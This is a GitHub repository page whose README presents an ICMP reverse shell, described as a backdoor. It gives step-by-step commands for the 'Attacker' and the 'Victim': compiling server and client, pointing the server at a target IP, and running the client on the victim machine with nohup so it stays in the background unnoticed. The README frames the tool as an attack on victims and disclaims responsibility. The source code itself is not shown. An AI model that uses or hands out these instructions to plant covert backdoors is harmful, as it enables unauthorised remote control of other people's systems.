Skip to content

ferreiraklet/icmp_reverse_shell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

21 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

icmp_reverse_shell

ICMP REVERSE SHELL / BACKDOOR

Hi, hope you are doing well, this project is about reverse shell using icmp, here is how it can be used

Usage

FIrstly, compile it in your machine

Attacker:

gcc server.c -o server -pthread

Victim:

gcc client.c -o client -pthread

To Run the Server:

./server <target-ip>
./server 192.168.1.9

Run the client on victim machine

./client

You can use nohup to put the process in background

nohup ./client &

Note I'm not responsible for any of your actions,

Be happy.

References

ICMPSH

ICMPSHELL

ICMPDOOR

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages